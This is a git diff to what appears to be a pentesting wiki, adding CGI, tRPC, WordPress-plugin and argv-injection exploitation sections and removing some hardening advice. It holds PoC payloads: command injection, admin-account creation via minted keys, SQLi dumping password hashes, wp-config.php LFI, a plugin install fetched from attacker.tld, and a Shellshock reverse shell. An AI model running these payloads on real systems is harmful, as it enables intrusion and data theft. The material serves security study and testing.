diff --git a/src/linux-hardening/privilege-escalation/README.md b/src/linux-hardening/privilege-escalation/README.md index d820428c9..bfcee2d9c 100644 --- a/src/linux-hardening/privilege-escalation/README.md +++ b/src/linux-hardening/privilege-escalation/README.md @@ -83,7 +83,7 @@ You can check if the sudo version is vulnerable using this grep. sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\*\|1\.8\.2[01234567]" ``` -#### sudo < v1.28 +#### sudo < v1.8.28 From @sickrov diff --git a/src/network-services-pentesting/pentesting-web/cgi.md b/src/network-services-pentesting/pentesting-web/cgi.md index a3625f877..7cc8bce59 100644 --- a/src/network-services-pentesting/pentesting-web/cgi.md +++ b/src/network-services-pentesting/pentesting-web/cgi.md @@ -59,11 +59,37 @@ curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' htt > run ``` -## **Proxy \(MitM to Web server requests\)** +## Centralized CGI dispatchers (single endpoint routing via selector parameters) -CGI creates a environment variable for each header in the http request. For example: "host:web.com" is created as "HTTP_HOST"="web.com" +Many embedded web UIs multiplex dozens of privileged actions behind a single CGI endpoint (for example, `/cgi-bin/cstecgi.cgi`) and use a selector parameter such as `topicurl=` to route the request to an internal function. -As the HTTP_PROXY variable could be used by the web server. Try to send a **header** containing: "**Proxy: <IP_attacker>:<PORT>**" and if the server performs any request during the session. You will be able to capture each request made by the server. +Methodology to exploit these routers: + +- Enumerate handler names: scrape JS/HTML, brute-force with wordlists, or unpack firmware and grep for handler strings used by the dispatcher. +- Test unauthenticated reachability: some handlers forget auth checks and are directly callable. +- Focus on handlers that invoke system utilities or touch files; weak validators often only block a few characters and might miss the leading hyphen `-`. + +Generic exploit shapes: + +```http +POST /cgi-bin/cstecgi.cgi HTTP/1.1 +Content-Type: application/x-www-form-urlencoded + +# 1) Option/flag injection (no shell metacharacters): flip argv of downstream tools +topicurl=¶m=-n + +# 2) Parameter-to-shell injection (classic RCE) when a handler concatenates into a shell +topicurl=setEasyMeshAgentCfg&agentName=;id; + +# 3) Validator bypass → arbitrary file write in file-touching handlers +topicurl=setWizardCfg&=/etc/init.d/S99rc +``` + +Detection and hardening: + +- Watch for unauthenticated requests to centralized CGI endpoints with `topicurl` set to sensitive handlers. +- Flag parameters that begin with `-` (argv option injection attempts). +- Vendors: enforce authentication on all state-changing handlers, validate using strict allowlists/types/lengths, and never pass user-controlled strings as command-line flags. ## Old PHP + CGI = RCE \(CVE-2012-1823, CVE-2012-2311\) @@ -80,8 +106,14 @@ curl -i --data-binary "" "http://jh2i.com:500 **More info about the vuln and possible exploits:** [**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/)**,** [**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823)**,** [**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311)**,** [**CTF Writeup Example**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.** +## **Proxy \(MitM to Web server requests\)** + +CGI creates a environment variable for each header in the http request. For example: "host:web.com" is created as "HTTP_HOST"="web.com" + +As the HTTP_PROXY variable could be used by the web server. Try to send a **header** containing: "**Proxy: <IP_attacker>:<PORT>**" and if the server performs any request during the session. You will be able to capture each request made by the server. + +## **References** + +- [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/) {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/network-services-pentesting/pentesting-web/web-api-pentesting.md b/src/network-services-pentesting/pentesting-web/web-api-pentesting.md index 7f613e839..00497a50f 100644 --- a/src/network-services-pentesting/pentesting-web/web-api-pentesting.md +++ b/src/network-services-pentesting/pentesting-web/web-api-pentesting.md @@ -28,6 +28,53 @@ Pentesting APIs involves a structured approach to uncovering vulnerabilities. Th - **Advanced Parameter Techniques**: Test with unexpected data types in JSON payloads or play with XML data for XXE injections. Also, try parameter pollution and wildcard characters for broader testing. - **Version Testing**: Older API versions might be more susceptible to attacks. Always check for and test against multiple API versions. +### Authorization & Business Logic (AuthN != AuthZ) — tRPC/Zod protectedProcedure pitfalls + +Modern TypeScript stacks commonly use tRPC with Zod for input validation. In tRPC, `protectedProcedure` typically ensures the request has a valid session (authentication) but does not imply the caller has the right role/permissions (authorization). This mismatch leads to Broken Function Level Authorization/BOLA if sensitive procedures are only gated by `protectedProcedure`. + +- Threat model: Any low-privileged authenticated user can call admin-grade procedures if role checks are missing (e.g., background migrations, feature flags, tenant-wide maintenance, job control). +- Black-box signal: `POST /api/trpc/.` endpoints that succeed for basic accounts when they should be admin-only. Self-serve signups drastically increase exploitability. +- Typical tRPC route shape (v10+): JSON body wrapped under `{"input": {...}}`. + +Example vulnerable pattern (no role/permission gate): + +```ts +// The endpoint for retrying a migration job +// This checks for a valid session (authentication) +retry: protectedProcedure + // but not for an admin role (authorization). + .input(z.object({ name: z.string() })) + .mutation(async ({ input, ctx }) => { + // Logic to restart a sensitive migration + }), +``` + +Practical exploitation (black-box) + +1) Register a normal account and obtain an authenticated session (cookies/headers). +2) Enumerate background jobs or other sensitive resources via “list”/“all”/“status” procedures. + +```bash +curl -s -X POST 'https:///api/trpc/backgroundMigrations.all' \ + -H 'Content-Type: application/json' \ + -b '' \ + --data '{"input":{}}' +``` + +3) Invoke privileged actions such as restarting a job: + +```bash +curl -s -X POST 'https:///api/trpc/backgroundMigrations.retry' \ + -H 'Content-Type: application/json' \ + -b '' \ + --data '{"input":{"name":""}}' +``` + +Impact to assess + +- Data corruption via non-idempotent restarts: Forcing concurrent runs of migrations/workers can create race conditions and inconsistent partial states (silent data loss, broken analytics). +- DoS via worker/DB starvation: Repeatedly triggering heavy jobs can exhaust worker pools and database connections, causing tenant-wide outages. + ### **Tools and Resources for API Pentesting** - [**kiterunner**](https://github.com/assetnote/kiterunner): Excellent for discovering API endpoints. Use it to scan and brute force paths and parameters against target APIs. @@ -53,8 +100,6 @@ kr brute https://domain.com/api/ -w /tmp/lang-english.txt -x 20 -d=0 ## References - [https://github.com/Cyber-Guy1/API-SecurityEmpire](https://github.com/Cyber-Guy1/API-SecurityEmpire) +- [How An Authorization Flaw Reveals A Common Security Blind Spot: CVE-2025-59305 Case Study](https://www.depthfirst.com/post/how-an-authorization-flaw-reveals-a-common-security-blind-spot-cve-2025-59305-case-study) {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/network-services-pentesting/pentesting-web/wordpress.md b/src/network-services-pentesting/pentesting-web/wordpress.md index 7eea42ba0..cf9b546a2 100644 --- a/src/network-services-pentesting/pentesting-web/wordpress.md +++ b/src/network-services-pentesting/pentesting-web/wordpress.md @@ -447,15 +447,6 @@ Detection checklist - Review REST registrations for privileged callbacks that lack robust `permission_callback` checks and instead rely on request headers. - Look for usages of core user-management functions (`wp_insert_user`, `wp_create_user`) inside REST handlers that are gated only by header values. -Hardening - -- Never derive authentication or authorization from client-controlled headers. -- If a reverse proxy must inject identity, terminate trust at the proxy and strip inbound copies (e.g., `unset X-Wcpay-Platform-Checkout-User` at the edge), then pass a signed token and verify it server-side. -- For REST routes performing privileged actions, require `current_user_can()` checks and a strict `permission_callback` (do NOT use `__return_true`). -- Prefer first-party auth (cookies, application passwords, OAuth) over header “impersonation”. - -References: see the links at the end of this page for a public case and broader analysis. - ### Unauthenticated Arbitrary File Deletion via wp_ajax_nopriv (Litho Theme <= 3.0) WordPress themes and plugins frequently expose AJAX handlers through the `wp_ajax_` and `wp_ajax_nopriv_` hooks. When the **_nopriv_** variant is used **the callback becomes reachable by unauthenticated visitors**, so any sensitive action must additionally implement: @@ -511,31 +502,6 @@ Other impactful targets include plugin/theme `.php` files (to break security plu * Concatenation of unsanitised user input into paths (look for `$_POST`, `$_GET`, `$_REQUEST`). * Absence of `check_ajax_referer()` and `current_user_can()`/`is_user_logged_in()`. -#### Hardening - -```php -function secure_remove_font_family() { - if ( ! is_user_logged_in() ) { - wp_send_json_error( 'forbidden', 403 ); - } - check_ajax_referer( 'litho_fonts_nonce' ); - - $fontfamily = sanitize_file_name( wp_unslash( $_POST['fontfamily'] ?? '' ) ); - $srcdir = trailingslashit( wp_upload_dir()['basedir'] ) . 'litho-fonts/' . $fontfamily; - - if ( ! str_starts_with( realpath( $srcdir ), realpath( wp_upload_dir()['basedir'] ) ) ) { - wp_send_json_error( 'invalid path', 400 ); - } - // … proceed … -} -add_action( 'wp_ajax_litho_remove_font_family_action_data', 'secure_remove_font_family' ); -// 🔒 NO wp_ajax_nopriv_ registration -``` - -> [!TIP] -> **Always** treat any write/delete operation on disk as privileged and double-check: -> • Authentication • Authorisation • Nonce • Input sanitisation • Path containment (e.g. via `realpath()` plus `str_starts_with()`). - --- ### Privilege escalation via stale role restoration and missing authorization (ASE "View Admin as Role") @@ -565,12 +531,6 @@ Why it’s exploitable - If a user previously had higher privileges saved in `_asenha_view_admin_as_original_roles` and was downgraded, they can restore them by hitting the reset path. - In some deployments, any authenticated user could trigger a reset for another username still present in `viewing_admin_as_role_are` (broken authorization). -Attack prerequisites - -- Vulnerable plugin version with the feature enabled. -- Target account has a stale high-privilege role stored in user meta from earlier use. -- Any authenticated session; missing nonce/capability on the reset flow. - Exploitation (example) ```bash @@ -591,21 +551,6 @@ Detection checklist - Modify roles via `add_role()` / `remove_role()` without `current_user_can()` and `wp_verify_nonce()` / `check_admin_referer()`. - Authorize based on a plugin option array (e.g., `viewing_admin_as_role_are`) instead of the actor’s capabilities. -Hardening - -- Enforce capability checks on every state-changing branch (e.g., `current_user_can('manage_options')` or stricter). -- Require nonces for all role/permission mutations and verify them: `check_admin_referer()` / `wp_verify_nonce()`. -- Never trust request-supplied usernames; resolve the target user server-side based on the authenticated actor and explicit policy. -- Invalidate “original roles” state on profile/role updates to avoid stale high-privilege restoration: - -```php -add_action( 'profile_update', function( $user_id ) { - delete_user_meta( $user_id, '_asenha_view_admin_as_original_roles' ); -}, 10, 1 ); -``` - -- Consider storing minimal state and using time-limited, capability-guarded tokens for temporary role switches. - --- ### Unauthenticated privilege escalation via cookie‑trusted user switching on public init (Service Finder “sf-booking”) @@ -852,6 +797,123 @@ Patched behaviour (Jobmonster 4.8.0) - Removed the insecure fallback from $_POST['id']; $user_email must originate from verified provider branches in switch($_POST['using']). +## Unauthenticated privilege escalation via REST token/key minting on predictable identity (OttoKit/SureTriggers ≤ 1.0.82) + +Some plugins expose REST endpoints that mint reusable “connection keys” or tokens without verifying the caller’s capabilities. If the route authenticates only on a guessable attribute (e.g., username) and does not bind the key to a user/session with capability checks, any unauthenticated attacker can mint a key and invoke privileged actions (admin account creation, plugin actions → RCE). + +- Vulnerable route (example): sure-triggers/v1/connection/create-wp-connection +- Flaw: accepts a username, issues a connection key without current_user_can() or a strict permission_callback +- Impact: full takeover by chaining the minted key to internal privileged actions + +PoC – mint a connection key and use it + +```bash +# 1) Obtain key (unauthenticated). Exact payload varies per plugin +curl -s -X POST "https://victim.tld/wp-json/sure-triggers/v1/connection/create-wp-connection" \ + -H 'Content-Type: application/json' \ + --data '{"username":"admin"}' +# → {"key":"", ...} + +# 2) Call privileged plugin action using the minted key (namespace/route vary per plugin) +curl -s -X POST "https://victim.tld/wp-json/sure-triggers/v1/users" \ + -H 'Content-Type: application/json' \ + -H 'X-Connection-Key: ' \ + --data '{"username":"pwn","email":"p@t.ld","password":"p@ss","role":"administrator"}' +``` + +Why it’s exploitable +- Sensitive REST route protected only by low-entropy identity proof (username) or missing permission_callback +- No capability enforcement; minted key is accepted as a universal bypass + +Detection checklist +- Grep plugin code for register_rest_route(..., [ 'permission_callback' => '__return_true' ]) +- Any route that issues tokens/keys based on request-supplied identity (username/email) without tying to an authenticated user or capability +- Look for subsequent routes that accept the minted token/key without server-side capability checks + +Hardening +- For any privileged REST route: require permission_callback that enforces current_user_can() for the required capability +- Do not mint long-lived keys from client-supplied identity; if needed, issue short-lived, user-bound tokens post-authentication and recheck capabilities on use +- Validate the caller’s user context (wp_set_current_user is not sufficient alone) and reject requests where !is_user_logged_in() || !current_user_can() + +--- + +## Nonce gate misuse → unauthenticated arbitrary plugin installation (FunnelKit Automations ≤ 3.5.3) + +Nonces prevent CSRF, not authorization. If code treats a nonce pass as a green light and then skips capability checks for privileged operations (e.g., install/activate plugins), unauthenticated attackers can meet a weak nonce requirement and reach RCE by installing a backdoored or vulnerable plugin. + +- Vulnerable path: plugin/install_and_activate +- Flaw: weak nonce hash check; no current_user_can('install_plugins'|'activate_plugins') once nonce “passes” +- Impact: full compromise via arbitrary plugin install/activation + +PoC (shape depends on plugin; illustrative only) + +```bash +curl -i -s -X POST https://victim.tld/wp-json//plugin/install_and_activate \ + -H 'Content-Type: application/json' \ + --data '{"_nonce":"","slug":"hello-dolly","source":"https://attacker.tld/mal.zip"}' +``` + +Detection checklist +- REST/AJAX handlers that modify plugins/themes with only wp_verify_nonce()/check_admin_referer() and no capability check +- Any code path that sets $skip_caps = true after nonce validation + +Hardening +- Always treat nonces as CSRF tokens only; enforce capability checks regardless of nonce state +- Require current_user_can('install_plugins') and current_user_can('activate_plugins') before reaching installer code +- Reject unauthenticated access; avoid exposing nopriv AJAX actions for privileged flows + +--- + +## Unauthenticated SQLi via s search parameter in depicter-* actions (Depicter Slider ≤ 3.6.1) + +Multiple depicter-* actions consumed the s (search) parameter and concatenated it into SQL queries without parameterization. + +- Parameter: s (search) +- Flaw: direct string concatenation in WHERE/LIKE clauses; no prepared statements/sanitization +- Impact: database exfiltration (users, hashes), lateral movement + +PoC + +```bash +# Replace action with the affected depicter-* handler on the target +curl -G "https://victim.tld/wp-admin/admin-ajax.php" \ + --data-urlencode 'action=depicter_search' \ + --data-urlencode "s=' UNION SELECT user_login,user_pass FROM wp_users-- -" +``` + +Detection checklist +- Grep for depicter-* action handlers and direct use of $_GET['s'] or $_POST['s'] in SQL +- Review custom queries passed to $wpdb->get_results()/query() concatenating s + +Hardening +- Always use $wpdb->prepare() or wpdb placeholders; reject unexpected metacharacters server-side +- Add a strict allowlist for s and normalize to expected charset/length + +--- + +## Unauthenticated Local File Inclusion via unvalidated template/file path (Kubio AI Page Builder ≤ 2.5.1) + +Accepting attacker-controlled paths in a template parameter without normalization/containment allows reading arbitrary local files, and sometimes code execution if includable PHP/log files are pulled into runtime. + +- Parameter: __kubio-site-edit-iframe-classic-template +- Flaw: no normalization/allowlisting; traversal permitted +- Impact: secret disclosure (wp-config.php), potential RCE in specific environments (log poisoning, includable PHP) + +PoC – read wp-config.php + +```bash +curl -i "https://victim.tld/?__kubio-site-edit-iframe-classic-template=../../../../wp-config.php" +``` + +Detection checklist +- Any handler concatenating request paths into include()/require()/read sinks without realpath() containment +- Look for traversal patterns (../) reaching outside the intended templates directory + +Hardening +- Enforce allowlisted templates; resolve with realpath() and require str_starts_with(realpath(file), realpath(allowed_base)) +- Normalize input; reject traversal sequences and absolute paths; use sanitize_file_name() only for filenames (not full paths) + + ## References - [Unauthenticated Arbitrary File Deletion Vulnerability in Litho Theme](https://patchstack.com/articles/unauthenticated-arbitrary-file-delete-vulnerability-in-litho-the/) @@ -863,7 +925,11 @@ Patched behaviour (Jobmonster 4.8.0) - [Hackers exploiting critical WordPress WooCommerce Payments bug](https://www.bleepingcomputer.com/news/security/hackers-exploiting-critical-wordpress-woocommerce-payments-bug/) - [Unpatched Privilege Escalation in Service Finder Bookings Plugin](https://patchstack.com/articles/unpatched-privilege-escalation-in-service-finder-bookings-plugin/) - [Service Finder Bookings privilege escalation – Patchstack DB entry](https://patchstack.com/database/wordpress/plugin/sf-booking/vulnerability/wordpress-service-finder-booking-6-0-privilege-escalation-vulnerability) - - [Unauthenticated Broken Authentication Vulnerability in WordPress Jobmonster Theme](https://patchstack.com/articles/unauthenticated-broken-authentication-vulnerability-in-wordpress-jobmonster-theme/) +- [Q3 2025’s most exploited WordPress vulnerabilities and how RapidMitigate blocked them](https://patchstack.com/articles/q3-2025s-most-exploited-wordpress-vulnerabilities-and-how-patchstacks-rapidmitigate-blocked-them/) +- [OttoKit (SureTriggers) ≤ 1.0.82 – Privilege Escalation (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/suretriggers/vulnerability/wordpress-suretriggers-1-0-82-privilege-escalation-vulnerability) +- [FunnelKit Automations ≤ 3.5.3 – Unauthenticated arbitrary plugin installation (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/wp-marketing-automations/vulnerability/wordpress-recover-woocommerce-cart-abandonment-newsletter-email-marketing-marketing-automation-by-funnelkit-plugin-3-5-3-missing-authorization-to-unauthenticated-arbitrary-plugin-installation-vulnerability) +- [Depicter Slider ≤ 3.6.1 – Unauthenticated SQLi via s parameter (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/depicter/vulnerability/wordpress-depicter-slider-plugin-3-6-1-unauthenticated-sql-injection-via-s-parameter-vulnerability) +- [Kubio AI Page Builder ≤ 2.5.1 – Unauthenticated LFI (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/kubio/vulnerability/wordpress-kubio-ai-page-builder-plugin-2-5-1-unauthenticated-local-file-inclusion-vulnerability) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md index 8529062f6..d3e593336 100644 --- a/src/pentesting-web/command-injection.md +++ b/src/pentesting-web/command-injection.md @@ -158,6 +158,37 @@ execFile('/usr/bin/do-something', [ Real-world case: *Synology Photos* ≤ 1.7.0-0794 was exploitable through an unauthenticated WebSocket event that placed attacker controlled data into `id_user` which was later embedded in an `exec()` call, achieving RCE (Pwn2Own Ireland 2024). +### Argument/Option injection via leading hyphen (argv, no shell metacharacters) + +Not all injections require shell metacharacters. If the application passes untrusted strings as arguments to a system utility (even with `execve`/`execFile` and no shell), many programs will still parse any argument that begins with `-` or `--` as an option. This lets an attacker flip modes, change output paths, or trigger dangerous behaviors without ever breaking into a shell. + +Typical places where this appears: + +- Embedded web UIs/CGI handlers that build commands like `ping `, `tcpdump -i -w `, `curl `, etc. +- Centralized CGI routers (e.g., `/cgi-bin/.cgi` with a selector parameter like `topicurl=`) where multiple handlers reuse the same weak validator. + +What to try: + +- Provide values that start with `-`/`--` to be consumed as flags by the downstream tool. +- Abuse flags that change behavior or write files, for example: + - `ping`: `-f`/`-c 100000` to stress the device (DoS) + - `curl`: `-o /tmp/x` to write arbitrary paths, `-K ` to load attacker-controlled config + - `tcpdump`: `-G 1 -W 1 -z /path/script.sh` to achieve post-rotate execution in unsafe wrappers +- If the program supports `--` end-of-options, try to bypass naive mitigations that prepend `--` in the wrong place. + +Generic PoC shapes against centralized CGI dispatchers: + +``` +POST /cgi-bin/cstecgi.cgi HTTP/1.1 +Content-Type: application/x-www-form-urlencoded + +# Flip options in a downstream tool via argv injection +topicurl=¶m=-n + +# Unauthenticated RCE when a handler concatenates into a shell +topicurl=setEasyMeshAgentCfg&agentName=;id; +``` + ## Brute-Force Detection List @@ -173,5 +204,6 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject - [Extraction of Synology encrypted archives – Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html) - [PHP proc_open manual](https://www.php.net/manual/en/function.proc-open.php) - [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html) +- [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/) {{#include ../banners/hacktricks-training.md}} diff --git a/src/welcome/hacktricks-values-and-faq.md b/src/welcome/hacktricks-values-and-faq.md index 99e5fe656..8c4e6faf8 100644 --- a/src/welcome/hacktricks-values-and-faq.md +++ b/src/welcome/hacktricks-values-and-faq.md @@ -144,4 +144,3 @@ This license does not grant any trademark or branding rights in relation to the {{#include ../banners/hacktricks-training.md}} -